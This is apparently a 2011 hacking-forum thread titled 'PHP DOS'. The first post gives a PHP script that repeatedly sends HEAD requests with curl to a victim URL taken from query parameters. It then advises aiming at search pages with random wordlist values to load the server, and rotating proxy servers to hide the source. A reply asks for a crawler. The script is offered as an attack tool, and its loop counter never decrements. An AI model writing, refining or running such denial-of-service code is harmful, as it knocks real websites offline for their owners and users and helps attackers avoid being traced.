Topic: PHP DOS

Pretty simple, not very elegant. The key for that script is to point at a page that does something like search. Here's the base script:

    <?php
    $link = $_GET['link']; //to be attacked.
    $times = $_GET['times']; // how many times to connect

    while($times > 0){
    sleep(30);
    $ch = curl_init($link);
    curl_setopt($ch, CURLOPT_NOBODY, 1); //Important. Changes to a head request, don't have to wait and listen for reply.
    curl_exec($ch);
    curl_close($ch);
    }
    ?>


Some suggestions: change it up so that it appends random values to the end of the link, therefore searching the vic server for random values; the link would look like [Register or log in to view the URL] Ideally this would pull from a wordlist so the server would be under more strain while processing this. Also, you can use CURLOPT_PROXY to use a proxy server. If you cant cycle over a list of proxy ips you provide in a separate text file....

Last edited by Del_Armg0 (2011-12-05 02:59:05)

Re: PHP DOS

Loooks simle enough do you have a crawler of some sort?